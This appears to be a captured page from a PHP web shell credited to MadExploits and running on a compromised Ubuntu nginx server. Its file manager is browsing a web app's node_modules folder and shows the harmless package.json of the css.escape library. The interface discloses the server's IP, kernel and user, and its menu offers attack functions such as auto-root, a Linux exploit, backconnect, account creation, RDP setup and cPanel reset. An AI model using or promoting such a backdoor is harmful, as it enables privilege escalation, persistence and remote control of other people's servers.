Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
css.escape /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE-MIT.txt
1.05
KB
-rw-rw-rw-
README.md
1.27
KB
-rw-rw-rw-
css.escape.js
3.08
KB
-rw-rw-rw-
package.json
956
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "css.escape", "version": "1.5.1", "description": "A robust polyfill for the `CSS.escape` utility method as defined in CSSOM.", "homepage": "https://mths.be/cssescape", "main": "css.escape.js", "keywords": [ "string", "unicode", "identifier", "css", "cssom", "polyfill" ], "license": "MIT", "author": { "name": "Mathias Bynens", "url": "https://mathiasbynens.be/" }, "repository": { "type": "git", "url": "https://github.com/mathiasbynens/CSS.escape.git" }, "bugs": "https://github.com/mathiasbynens/CSS.escape/issues", "files": [ "LICENSE-MIT.txt", "css.escape.js" ], "scripts": { "test": "node tests/tests.js", "cover": "istanbul cover --report html --verbose --dir coverage tests/tests.js", "coveralls": "istanbul cover --verbose --dir coverage tests/tests.js && coveralls < coverage/lcov.info; rm -rf coverage/lcov*" }, "devDependencies": { "coveralls": "^2.11.4", "istanbul": "^0.4.1" } }
Close